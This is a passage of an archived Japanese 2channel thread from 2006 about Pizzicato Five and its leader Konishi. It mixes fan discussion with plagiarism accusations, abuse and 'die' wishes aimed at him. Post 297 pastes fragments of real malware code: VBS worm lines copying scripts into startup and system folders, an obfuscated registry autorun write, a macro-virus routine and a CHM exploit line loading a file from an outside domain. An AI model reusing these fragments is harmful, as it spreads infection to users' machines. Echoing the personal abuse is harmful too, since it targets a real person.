158 :伝説の名無しさん:2006/06/24(土) 20:30:19
内面の汚さと外見の汚さが一致している

159 :伝説の名無しさん:2006/06/25(日) 14:13:21
アナログプレミアついてねーじゃねーかぁよ。
各15枚も買ったのに

160 :伝説の名無しさん:2006/06/25(日) 14:38:32
いつの時代の話よ

161 :伝説の名無しさん:2006/06/25(日) 15:37:56
ピチカート聴いてると東京どんだけ素晴らしいんだよって思っちゃう


うちの近所なんか
ヤンキー多いし
いっつも工事してるし
窓あけたら目の前となりの家の壁だし
地方出身者ばっかで東京生まれがむしろなんかみじめだし
小田急線めっさ混むし
彼女めっさブッサイクだし
ピチカートのCD、ラックからはみ出して、和を乱すし
昨日なんか、一日中、新世紀エヴァンゲリオンとのだめカンタービレ読みふけってたし
最近何食ってもウマイと感じないし

162 :伝説の名無しさん:2006/06/25(日) 19:08:47
昨日、月面軟着陸630円で買いました。良いですね。野宮時代しか知らなかったんですが、
田島時代もいいかも。

163 :伝説の名無しさん:2006/06/25(日) 22:23:26
野宮って結構な歳なんだよな

164 :伝説の名無しさん:2006/06/25(日) 23:13:12
陽の当たる大通りの音程の取り方は絶妙だな

165 :伝説の名無しさん:2006/06/26(月) 20:37:27

歌詞によく「死」が入ってるのが好き

あの世行き音楽として永遠に聴き続けたいと思ってます


166 :伝説の名無しさん:2006/06/26(月) 23:57:20
天国に逝けるかな 幸せに死ねるかな♪

167 :伝説の名無しさん:2006/06/27(火) 01:09:33
>>166
その一節に限らず、小西はなんだかんだ言っても作詞の能力はある程度高いと思う。
恋してるなんて もう若くないのに
とか、
これは恋ではなくって ただの痛み
とか、よくできてるよ。
ただ、過去の曲のリメイクで歌詞を書き換えるのはいただけないが。
サマータイムの歌詞の変え方は、今でも納得できない。

168 :伝説の名無しさん:2006/06/27(火) 01:15:04
糞キノコの菓子は全てパクリwwwwww
氏ね。

169 :伝説の名無しさん:2006/06/27(火) 02:46:52
なんか、ホリプロだか何処だかの新人オーディションで、
グランプリ獲った女性のCDデビュー曲を、小西さんがプロデュースするんだと。
ったく、つんく♂みたいなことやってんじゃねーよ…。
どーせ、過去の曲と似たり寄ったりなヤツ提供するだけだしさぁ。
仕事選んで欲しいよ、ホント。


170 :伝説の名無しさん:2006/06/27(火) 03:42:07
落ち目な糞コニシが仕事なんか選べねーだろwwwwwww

171 :伝説の名無しさん:2006/06/27(火) 07:48:27
まったピチカートのカバーだったりしてな

172 :伝説の名無しさん:2006/06/27(火) 09:31:06
>>168
あ、そうだったの?
どこからパクってるの?

173 :伝説の名無しさん:2006/06/27(火) 12:03:37
「これは恋ではない」
 ↓
「これはパイプではない」

  /\___/\ 
/ ⌒   ⌒ ::: \ 
| (●), 、(●)、 |    / ̄ ̄ ̄ ̄ ̄ 
|  ,,ノ(、_, )ヽ、,,   |  < パクりじゃん 
|   ト‐=‐ァ'   .::::|    \_____ 
\  `ニニ´  .:::/ 
/`ー‐--‐‐―´´\


…程度の認識と思われ

174 :伝説の名無しさん:2006/06/27(火) 14:34:32
その認識だと、万事快調も戦争は終わったも、la regle du jeuまでもパクリだな。
さすがキノコはパクリ王だ。なるほど、よくわかった。

175 :伝説の名無しさん:2006/06/27(火) 15:36:26

陽の当たる大通り On The Sunny Side Street
いいやねwパクリだとタイトル名を考えなくていいからwwwwww

176 :伝説の名無しさん:2006/06/27(火) 19:11:36
ばーいばーいばーいばーいばーいばーいばーいばーい

オザケンのラブリーみたいやよね。同じ元ネタかな?

177 :伝説の名無しさん:2006/06/27(火) 19:14:26
野本かりあの新譜が売ってない・・・。

178 :伝説の名無しさん:2006/06/27(火) 19:29:11
クールの誕生→マイルス・デイビス・・・
あ〜ぁwwww

179 :伝説の名無しさん:2006/06/27(火) 19:32:46
キ モ コ ニ シ っ て 創 造 力 皆 無 だ な


180 :伝説の名無しさん:2006/06/27(火) 21:44:36
>>150
ここのレスのほとんどが高浪一人の自演ですよ

181 :伝説の名無しさん:2006/06/28(水) 19:46:03
お早う、東京の合唱→小津のパクリ
東京は夜の七時→矢野顕子のパクリ
眺めのいい部屋→イタリア映画のパクリ

182 :伝説の名無しさん:2006/06/28(水) 19:47:27
さえらジャポン→東京オリンピックポスターのパクリ

183 :伝説の名無しさん:2006/06/28(水) 20:10:50
パクりをリスペクトと開き直って堂々として、ぬすっとたけだけしいとは正にこのことですな

184 :伝説の名無しさん:2006/06/28(水) 20:11:25
それは大瀧詠一です

185 :伝説の名無しさん:2006/06/28(水) 21:00:57
アパートの鍵が開かない

186 :伝説の名無しさん:2006/06/28(水) 21:15:12
人格障害キモコニシ人格障害キモコニシ人格障害キモコニシ人格障害キモコニシ

187 :伝説の名無しさん:2006/06/29(木) 00:03:59
>>181
タイトルがどうのこうのじゃなくてさ。
あの曲のメロディのどこそこをパクってるとか、そういう話をしてほしいんだけど。
できないならチラシの裏にな。

188 :伝説の名無しさん:2006/06/29(木) 00:38:04
てかそんなのみんな知ってると思うんだけどな

ふてぶてしく本歌取りするところが面白いんじゃないか

189 :伝説の名無しさん:2006/06/29(木) 00:54:22
>>188
そうそう。知ってたら知ってたで、そういう楽しみ方できるのが正解。
>>181の思考回路でいけば、手塚の火の鳥も、イモの東風、中国女、ピエロ、
筒井康隆のカラダ記念日もパクりになるな。凄い理論だ。

190 :伝説の名無しさん:2006/06/29(木) 01:05:59
名曲をパッチワークにしまくって、音楽なんか全然愛してないぜ!
っていうひねくれたポーズがコニタンの音楽の愛し方なの

要はツンデレってことよ
ボンクラにはわかんないだろうけど

191 :伝説の名無しさん:2006/06/29(木) 01:11:07
未だに、再発盤を全部買って特典を貰うかどうか検討してる。
全部買うとしたら、あと、13枚買わないといけないから・・・。
ホント、いい加減にしてほしい。

192 :伝説の名無しさん:2006/06/29(木) 01:34:15
↑ばかw

193 :伝説の名無しさん:2006/06/29(木) 01:40:59
気分にムラがあるみたいね。
基本的に暗いんだよ。
妻と共に買い物依存症というのも
みっともない。
もうあまり人前に出ないほうが
いいと思う。


194 :伝説の名無しさん:2006/06/29(木) 01:57:56




>要はツンデレってことよ
>ボンクラにはわかんないだろうけど







195 :191:2006/06/29(木) 02:00:24
>>192

ワタクシは単なるばかではありません!

ピチカート・ばかなんですw

196 :伝説の名無しさん:2006/06/29(木) 02:13:30
>>195

>127

と、言う訳で、俺からも謹んで言わせた貰う。
191は、救いようの無い馬鹿。
コロムビアにとっては、良い鴨。

197 :伝説の名無しさん:2006/06/29(木) 02:30:16
さえら会にとっては、良い出資者

198 :伝説の名無しさん:2006/06/29(木) 02:40:16
上げるんじゃねーよ、糞馬鹿。
テメェ、○すぞ。

199 :伝説の名無しさん:2006/06/29(木) 02:41:00
むほ誰が書いたか丸わかりw

200 :伝説の名無しさん:2006/06/29(木) 03:54:16
キモメンコニシと愉快なキモメン達のスレはここですか?

201 :伝説の名無しさん:2006/06/29(木) 05:42:08
>>195
単なるばかならまだいいが、ピチカート・ばかは手のつけようがない。逝ってくれ。

202 :伝説の名無しさん:2006/06/29(木) 05:44:31
呂婆んヌ

203 :伝説の名無しさん:2006/06/29(木) 06:10:49
R.I.Pのジャケ→ローリングストーンズ ベガーズバンケットのパクリ

204 :伝説の名無しさん:2006/06/29(木) 06:14:39
大人になりましょう→スライのファミリーアフェアのパクリ


205 :伝説の名無しさん:2006/06/29(木) 06:17:12
タイトル知らんがそれはそれでいんじゃないとか歌ってる糞ダセーヘボヘボ曲→ドノバンのエピストルトゥディビーのパクリ

206 :伝説の名無しさん:2006/06/29(木) 06:19:05
It's a beautiful day→ロジャニコのパクリ

207 :伝説の名無しさん:2006/06/29(木) 06:24:24
パクリマクリスティークソキモコニシ

208 :伝説の名無しさん:2006/06/29(木) 07:38:22
パクリパクリっていってるけど、よく知ってるね。
きっと僕たちよりもピチカートを愛してやまないんだね。

209 :伝説の名無しさん:2006/06/29(木) 13:03:33
バブリーな歌詞が鼻につく。
物に執着ありすぎ。
金持ち自慢かな。
または昔苦労した反動か。
本当にお金持ちの人は持ち物自慢なんか
しないと思う。


210 :伝説の名無しさん:2006/06/29(木) 13:15:58
元ネタは公言されてるようなものだから
パクリって認識ないけどな
ピチカートがきっかけで幅広く音楽に触れたのは確かだし
ロジャニコのがこれだけ売れたのって
日本だけでしょ

211 :伝説の名無しさん:2006/06/29(木) 13:45:29
資本主義下のケチくさい倫理観を逆撫でしてたんだから
むしろ90年代のパンクでしょう
本当に金持ちかどうかなんてどうでもいいこと

貧乏人はニート、金持ちはロハス、なんてライフスタイルが
蔓延してる現在、もうピチカートの居場所はないけどね

212 :伝説の名無しさん:2006/06/29(木) 14:02:41




>資本主義下のケチくさい倫理観を逆撫でしてたんだから

>むしろ90年代のパンクでしょう






213 :伝説の名無しさん:2006/06/29(木) 14:05:44
俺はああいうのちょっとアイロニックにやってたと思ったのだが
ケチくさい倫理観を逆撫でのほうだったのか

そうですか

214 :伝説の名無しさん:2006/06/29(木) 14:08:30
B'zはパンクだったのか

215 :伝説の名無しさん:2006/06/29(木) 14:31:05
スパンクハッピ

216 :伝説の名無しさん:2006/06/29(木) 15:02:01
浜崎もパンクだったのか

217 :伝説の名無しさん:2006/06/29(木) 15:05:29
イェイェイェイェイェイェイェイェイ
ゥオゥォウォウォウゥォウォウオウオウォウ

とかいうアホ曲あったよね。浜崎

218 :伝説の名無しさん:2006/06/29(木) 15:21:14
パンがなければスフレを食べればいいじゃない

219 :伝説の名無しさん:2006/06/29(木) 17:20:38
なんかアンチの金切り声聞いてると、まるで小西がポップスの泉を汚したとか、
ピチに音楽の枝をねじ曲げられたみたいな、嫌われっぷりなんだけど、
よく分かんないんだよね。ポップスリスナーとしてどうなんすかそのへん

220 :伝説の名無しさん:2006/06/29(木) 18:03:14
なっちもパンク

221 :伝説の名無しさん:2006/06/29(木) 20:33:50
>>209
妄想、理想、逃避の想像世界だから。
生活感ゼロの非日常性が受けたんだから。

>>211,213
どっちもありじゃない。
今なんて言われようと当時は時代のものとして受けたんだから
それはそれでいんじゃないか。
今さらどうでも……。

222 :伝説の名無しさん:2006/06/29(木) 23:13:54
税金を払ってりゃね

223 :伝説の名無しさん:2006/06/29(木) 23:39:26
>>221
ピチカートがなくなっても同じようなかんじのこと
やってるような気がするよ。
野本かりあで。
http://music5.2ch.net/test/read.cgi/musicjf/1148221519/

224 :伝説の名無しさん:2006/06/29(木) 23:57:54
>>219
同感。ピチカートが心の底から嫌いなら、聴かなきゃいいのにね。
どうして連中はパクりらしきものの元ネタみたいなのを持ち出して、わざわざ貶すのか。
前に書いたが、パクりと言ってもほとんど全部がタイトルだけとかだしね。
俺は、ここに顔を出すようになって小西の人間性が嫌になった口だが、
だからといってピチカートの全てを否定しようとは思えない。
小西の人格と、ピチカートの楽曲の良し悪しは別の話だしなあ。

おれんじれんじが「パクろうぜ!」とか言い出して久しいが、そのからみでも
パクりに関しては真剣に考えないといけないと思う。

225 :伝説の名無しさん:2006/06/29(木) 23:58:34
>>223
オマエさぁ〜、あざとい事するなよ…。
かりあスレが過疎化しているから、そうやって誘導してるんだろうけど、
それ、意味無いから。あんなの語るに足りない存在だ。
それに、オマエに言われなくても、
ピチカートと同じような事を、かりあでやっているなんてこと、
このスレの住人なら、誰でも知っているっつーの。



226 :221:2006/06/30(金) 00:08:39
>>223>>225
時代とズレちゃってるのに同じ事やってるから売れないんでしょ。
ほんとにどうでもいい。別に今小西が死んだとしても何とも思わないし。
小西の曲はもうどうやってもあの時代と同じようにはならないだろうし、
自分たちも同じようには聴けないだろうから。
とっくに役割は終わってる。

227 :伝説の名無しさん:2006/06/30(金) 00:19:08
Overdoseも「かつて地球にはロックという音楽があった」という
アイロニカルなノスタルジーで成立させてるアルバムだしね
もう一回りしないと次の夏は来ないよ

228 :伝説の名無しさん:2006/06/30(金) 00:22:30


>Overdoseも「かつて地球にはロックという音楽があった」という
>アイロニカルなノスタルジーで成立させてるアルバムだしね




229 :伝説の名無しさん:2006/06/30(金) 00:30:28
今だってロックあるじゃん、B'zとか

230 :伝説の名無しさん:2006/06/30(金) 02:33:31
昔、TVのインタビューで「ぼ、ぼ、ぼくお金使うの
大好きだから」とか「綺麗な女の人が好きです」とか
マジで言ってたよ
普通思っててもなかなか言えないと思うw

ピチカート=自分のこと歌ってるとかも言ってたかな。
気持ち悪いや

231 :伝説の名無しさん:2006/06/30(金) 02:34:40
あ、人格障害 w
知らんかった?

232 :伝説の名無しさん:2006/06/30(金) 02:50:09
お前よく知ってるなそんなインタビューとか

233 :伝説の名無しさん:2006/06/30(金) 07:36:14
>>230はこのスレの誰よりもピチカートをあいしてるのかもしれないね

234 :伝説の名無しさん:2006/06/30(金) 09:41:44
人格障害だとどうなんだろう

235 :伝説の名無しさん:2006/06/30(金) 11:05:36
キモイ

236 :伝説の名無しさん:2006/06/30(金) 14:33:54
うちの近所なんか
ヤンキー多いし
いっつも工事してるし
窓あけたら目の前となりの家の壁だし
地方出身者ばっかで東京生まれがむしろなんかみじめだし
小田急線めっさ混むし
彼女めっさブッサイクだし
ピチカートのCD、ラックからはみ出して、和を乱すし
昨日なんか、一日中、新世紀エヴァンゲリオンとのだめカンタービレ読みふけってたし
最近何食ってもウマイと感じないし




資本主義下のケチ臭い倫理観を逆撫でしたら僕も幸せになれるかな

237 :伝説の名無しさん:2006/06/30(金) 14:37:28
>>211>>213は結局同じことじゃないか?

238 :伝説の名無しさん:2006/06/30(金) 21:34:34
人格障害って・・
具体的にはどういう行動があった?

239 :伝説の名無しさん:2006/06/30(金) 21:52:56
NHKに野宮と一緒に出たとき、野宮はもう過去の人といった内容の発言を本人の前でしていた。

240 :伝説の名無しさん:2006/06/30(金) 23:24:30
ほうほう、それでそれで?

241 :伝説の名無しさん:2006/07/01(土) 02:40:16
>>239
人格障害というより性格悪いね
野本かりあ可哀想

242 :伝説の名無しさん:2006/07/01(土) 03:03:31
性格というより魂腐ってるね
周りが可哀想

243 :伝説の名無しさん:2006/07/01(土) 07:05:41
それであれだけのヒットメーカーなんだから
他のミュージシャンがいかに無能かってことだ

244 :伝説の名無しさん:2006/07/01(土) 07:39:12
音楽的な才能は全くないけど、まあおしゃれにあこがれる田舎者をだまして
うまいこと商売やってたのは本当だよね。
カリスマ性はあったと思うよ。池田○作や麻原しょうこう的なカリスマ性はね。
その点は有能。というか天才的。

245 :伝説の名無しさん:2006/07/01(土) 11:54:08
おはロック、踊ってる姿思い出すだけでキモイ
昔ちょっとだけファンだった自分が嫌になる


246 :伝説の名無しさん:2006/07/01(土) 13:58:00
青山ってところが味噌だよな
早稲田でもなく
明治でもなく
日大でもなく

247 :伝説の名無しさん:2006/07/01(土) 14:14:48
小西は青山でサザンの桑田がいたサークルに入ってたけど下手すぎて誰にも相手をしてもらえなかったらしい

248 :伝説の名無しさん:2006/07/01(土) 14:35:17
相手しなかった連中はみんなリーマンにでもなったか

憎まれっ子世にはばかるみたいで皮肉な話だな

249 :伝説の名無しさん:2006/07/02(日) 00:59:07
サザンが入ってるって知ってたら、入ってなかった
とか言ってたね

250 :伝説の名無しさん:2006/07/02(日) 03:19:47
多分小西の後付け話だろうけど、入った音楽サークルの先輩にサザンがいること
がわかって、「しまった! 間違えた。。。」と思ったらしい。


251 :伝説の名無しさん:2006/07/02(日) 11:16:21
でも、そこで出会ったのが、元ピチカートメンバー
なんでしょ。そんなこといちいち言わなくていいのにね。

252 :伝説の名無しさん:2006/07/02(日) 23:25:41
目が怖いよな

253 :伝説の名無しさん:2006/07/03(月) 00:12:30
地裁も怖いよな

254 :伝説の名無しさん:2006/07/03(月) 00:47:53
>>251
たしかに、その通りだね。そういうメンバーを大事にしないのが、後期の劣化を招
いた、っていう推測もあながち的外れではないように思う。
ものすごく好意的な解釈をすると、高浪なんかに「しまったなあって思ってる?
やっぱり。じゃ、気が合うかもしれないし、一緒にやらね?」とか持ちかけたのか
もしれない。



まあ、ありえないけどさ。

255 :伝説の名無しさん:2006/07/03(月) 01:11:05
なんで高浪は脱退しちゃったの?

256 :伝説の名無しさん:2006/07/03(月) 02:19:49
サザンの桑田が本当に大嫌いなんだな
分かるよその気持ち

257 :伝説の名無しさん:2006/07/03(月) 11:29:45
【ボサノバ】フレンチミュージック一派集合!!ドゥ(2)【シャンソン】
http://music4.2ch.net/test/read.cgi/wmusic/1084532931/

258 :伝説の名無しさん:2006/07/03(月) 13:36:42
↑ここと関係ないこと書くな!

259 :伝説の名無しさん:2006/07/03(月) 15:48:56
今出てるファッションニュース誌のインタビューでも
売れてるアーチストの例えでサザンとドリカムを出してた。

260 :伝説の名無しさん:2006/07/03(月) 15:51:01
栗ボーは原ボーによっぽどコンプレックスがあるんだね

261 :伝説の名無しさん:2006/07/03(月) 17:16:09
524表記はいかがなものか

262 :伝説の名無しさん:2006/07/03(月) 19:27:26
皆さん、今晩のNHK「PJDX」、取りあえず見ましょうね。
否、かりあについて良しとしない人が多いのは、よく分かりますし、
多分、放送されるのは、例の「東京は夜の七時」でしょうけど、
取りあえず、見てみましょう。で、後程ここで、
「アレはどうのこうの」と、語り合いましょう。


263 :伝説の名無しさん:2006/07/03(月) 19:31:40
> 取りあえず、見てみましょう。で、後程ここで、
> 「アレはどうのこうの」と、語り合いましょう。
断わる

264 :伝説の名無しさん:2006/07/03(月) 20:40:00
一応見てみるよ。
かりあの売り出し方はキモイけど、
かりあ自身はかわいいし大好きなので。

ちゃんとモデルみたいな活動したほうがいいんじゃないの?

265 :伝説の名無しさん:2006/07/03(月) 20:46:36
>>254
ただ単に他の連中が愛想尽かせて出てっただけだろ。
高浪も鴨宮も一緒にしちゃいけないけど田島もさ。

266 :伝説の名無しさん:2006/07/04(火) 00:38:04
>>263
とりあえず、こちらでどうでしょうか。

【東京は】野本かりあってどうなのよ?【夜の7時】
http://music5.2ch.net/test/read.cgi/musicjf/1148221519/

267 :伝説の名無しさん:2006/07/04(火) 00:59:09
>>262
番組見たよ。
正直な感想。↓
なにこのアレンジ 古くさー 、ダサッ。
アンチじゃないけど、ダメだコリャって思った。

歌い終わった後の、かりあの態度にのみ好感。

268 :伝説の名無しさん:2006/07/04(火) 13:51:14
なんだかカプセルとかラムライダーとかの
劣化版な音楽で驚いた!
後輩達にも負けてるなー。
悲しいよ・・・

269 :伝説の名無しさん:2006/07/04(火) 13:56:12
268
 ホモじゃないよね?
 間違いならゴメンね


270 :伝説の名無しさん:2006/07/04(火) 22:42:03
モナムール東京のPVすごくない?
http://www.youtube.com/watch?v=d-67i4hRBDg&search=pizzicato

271 :伝説の名無しさん:2006/07/05(水) 17:37:35
昔の曲の歌詞にたしか「いとしのエリー」って出てきたよね

272 :伝説の名無しさん:2006/07/05(水) 17:40:03
サザンはピチカートのことなど相手にもしてなかったと思うよ。

273 :伝説の名無しさん:2006/07/05(水) 21:15:10
>>272
そういう意味じゃなくて。。

274 :伝説の名無しさん:2006/07/05(水) 21:38:34
>>273
わかってるよ。
あの曲聴いて自意識過剰で嫌なかんじだなぁって
思ったので。

275 :伝説の名無しさん:2006/07/05(水) 21:41:55
ポップでキャッチーなスレはここですね

276 :伝説の名無しさん:2006/07/05(水) 23:20:01
昔の曲の焼き直しをよくするという点では両者は共通していますね

277 :伝説の名無しさん:2006/07/08(土) 20:01:25
おいおいそろそろ保守しろよ>ろバンヌおじさん

278 :伝説の名無しさん:2006/07/11(火) 00:00:41
>>255
小西のわがままについていけなくなったって聞いたけど

279 :伝説の名無しさん:2006/07/11(火) 00:14:27
今週スカパースターデジオ408chでピチカート2時間特集。

リスト
大人になりましょう, 東京は夜の七時, エアプレイン
A revolt of furntable & p5, ウィークエンド
さくらさくら,きみになりたい
プレイボーイ・プレイガール, クエスチョンズ
BOSSA NOVA 3003, 大東京, サンキュー
radio P5, 万事快調 ,美しい星 ,神様がくれたもの
アメリカでは, さえら ,If I were a groupie
三月生まれ ,スキヤキ・ソング , コンチェルト
世界中でいちばんきれいな女の子, exam from 524


280 :伝説の名無しさん:2006/07/11(火) 00:35:54
>>270
これ、ウゴルーでしょ

281 :伝説の名無しさん:2006/07/11(火) 01:20:59
>>278
あー、なるほど。
よくわかりました。

282 :伝説の名無しさん:2006/07/11(火) 20:28:53
>>279
スターデジオって映像なし?

283 :伝説の名無しさん:2006/07/11(火) 21:56:17
>>282
映像なし。
さすがにひとつのアーティストでPV2時間特集はないでしょ。
それもビンテージならなおさら。

だいたい、今回も変な曲混じってるし。

284 :伝説の名無しさん:2006/07/11(火) 23:17:08
お買い物はカードで♪
ダバダバダバダバ ダバダバダバ ダバダバダバッダー♪

285 :伝説の名無しさん:2006/07/12(水) 01:13:40
ノンストップ のーんストップ

286 :伝説の名無しさん:2006/07/12(水) 02:28:15
野宮ネエさんって六本木ヒルズに住んでるんだってね。カーサブルータスに書いてあった。

287 :伝説の名無しさん:2006/07/12(水) 02:59:44
まじっすか。資本主義のケチな倫理観全然逆なでてないじゃないっすか!
資本主義の犬じゃないっすか!

288 :伝説の名無しさん:2006/07/12(水) 07:33:36
高波さん、またアニメの曲作ってるみたいね

289 :伝説の名無しさん:2006/07/12(水) 22:03:58
万事快調
アパートの鍵.
これは恋ではない
ファンキー・ラブチャイルド
衛星中継
秘密の花園
皆笑った
悲しい歌
野いちご
神の御業
陽の当たる大通り

MP3プレーヤに殆どのアルバム入れて聴かない曲どんどん消していったらこれだけ残った

290 :伝説の名無しさん:2006/07/12(水) 22:57:21
>>289
んなオマエの好みなんぞ知らんし、どーでもエエがな。
こんな所に書かんと、チラシの裏にでも書けや。


291 :伝説の名無しさん:2006/07/12(水) 23:33:56
>>290
俺は意味ないとまでは思わないが。

>>289
やっぱりソニー時代がメインになるものかな。俺もそうなんだけど。
過去スレ見られないから共通認識がわかんないけど、女性上位以降は
クオリティーがたおちだと思う。


292 :伝説の名無しさん:2006/07/13(木) 04:29:06
さえらじゃぽんとか明らかにジャケ負け企画負けしてるよな

293 :伝説の名無しさん:2006/07/13(木) 21:04:17
>>290
みんないろいろだったけど、
ソニー┃壁┃野宮加入┃壁┃オーバードーズ
てな分かれ具合だったと思う。
抜けたり入ったりで壁が出来る感じ。
まぁソニー時代とコロンビア以降は別物でしょう。

294 :伝説の名無しさん:2006/07/13(木) 21:15:30
>>287
>資本主義の犬
ってのがケチな倫理観だとおも

295 :伝説の名無しさん:2006/07/13(木) 22:16:55
マジレスカッコいいっすね

296 :伝説の名無しさん:2006/07/14(金) 03:34:59
フリーダムのピチカートってもとから歌詞カード入ってない?

297 :伝説の名無しさん:2006/07/14(金) 07:23:27
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

298 :伝説の名無しさん:2006/07/14(金) 14:39:14
六本木WAVE、女性上位時代'Sのインストアライブに行ったよ。

299 :伝説の名無しさん:2006/07/14(金) 19:04:17
だからなに

300 :伝説の名無しさん:2006/07/14(金) 21:13:59
>>297
とりあえず、浦山。

301 :伝説の名無しさん:2006/07/14(金) 21:52:44
禿同
いいウィルスコードだな

302 :伝説の名無しさん:2006/07/16(日) 01:16:43
今フジの26時間で流れてるテーマ曲みたいなのって小西だよな。

歌詞は「人生ゲーム、早起きクイズ」だの、単なる固有名詞を並べただけ
(要は買物王やキッズチャレンジの手法まんま)
アレンジは過去の曲で使った音源の再利用の嵐。
確信的にやるのが面白いとでも思ってるんだろうけど
単に引き出しの無さ露呈してるだけなんでとっとと引退して下さい。

303 :伝説の名無しさん:2006/07/16(日) 05:04:32
なぜそんなコトで引退しなきゃいけないんだよ

304 :伝説の名無しさん:2006/07/16(日) 05:09:13
惰性で仕事してんじゃねえよヴォケ


ってことかと。

305 :伝説の名無しさん:2006/07/16(日) 15:39:52
もうそろそろ、再発盤の特典が送られてくる時期じゃね?

楽しみ!

306 :伝説の名無しさん:2006/07/17(月) 21:48:35
惰性で金儲けできるなんて、うらやましい限りじゃないか

307 :伝説の名無しさん:2006/07/18(火) 19:16:04
お金がなけりゃなきゃないでいいけど

308 :伝説の名無しさん:2006/07/18(火) 21:25:38
不景気そうな

309 :伝説の名無しさん:2006/07/18(火) 22:15:05
テレ東に野本かりあキターー!

310 :伝説の名無しさん:2006/07/18(火) 22:33:30
コロンビアの番組にちょっと出ただけだろ

311 :伝説の名無しさん:2006/07/18(火) 22:36:42
ちょっとしたサクセスストーリーっぽく描かれててワロタ

312 :伝説の名無しさん:2006/07/19(水) 21:42:54
お洒落だとか洗練されたなんて言われてたけれど、野暮ったいことこの上ないよね。

313 :伝説の名無しさん:2006/07/20(木) 07:19:46
くそきのこ

314 :伝説の名無しさん:2006/07/20(木) 10:16:08
テレ東のはやらせっぽかったな。
新しいビジネスモデルも成功しました。コロムビアは再生しました。みたいな。


315 :伝説の名無しさん:2006/07/22(土) 12:55:58
氏ねコニシ

316 :伝説の名無しさん:2006/07/23(日) 02:34:32
いまNHKにでていたが、あんなチャラい唄なんて
なめてんだろ、あの女。この連中でっちあげだね。
現役時もハナについたけど。

317 :伝説の名無しさん:2006/07/23(日) 02:51:25
かりあの歌は、ライヴでは下手クソぶりが隠しようもなく
出てしまうなぁ〜…。そして、その裏返しとして、
CDでは、(あれでも)如何に補正している
かというのが、如実に分かってしまう訳ですよ。

318 :伝説の名無しさん:2006/07/23(日) 03:44:19
NHKの実況板連帯感が合って楽しかった・・・

319 :伝説の名無しさん :2006/07/23(日) 19:34:50
あれ口パク?

320 :伝説の名無しさん:2006/07/25(火) 21:12:48
この前NHKでやってたアデューは悲しい‥って歌は、ピチカートの野宮真貴さんの時には歌われてないんですか?

いろいろ検索したんですけど、出て来なくって。
スレ汚しスマソ

321 :伝説の名無しさん:2006/07/25(火) 21:38:33
ピチカートはさぁ メッセージソングとか 陽のあたる大通り(だっけ?)とか いい曲っぽい曲のがいいんだよぉ

322 :伝説の名無しさん:2006/07/25(火) 23:59:09
ちょっと質問です。
月面軟着陸の初版(奥田収録盤)は
クリアトレイにカラーバックインレイのタイプと
通常の白トレイのタイプの2種ありで、
初回がクリアトレイでおけ?

323 :伝説の名無しさん:2006/07/26(水) 01:46:10
おけ

324 :伝説の名無しさん:2006/07/26(水) 02:00:08
>>320
それは野本オリジナルのはず。
少なくとも、ピチカートのレパートリーではない。

325 :伝説の名無しさん:2006/07/26(水) 14:50:27
>>324
ありがとう。

63 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)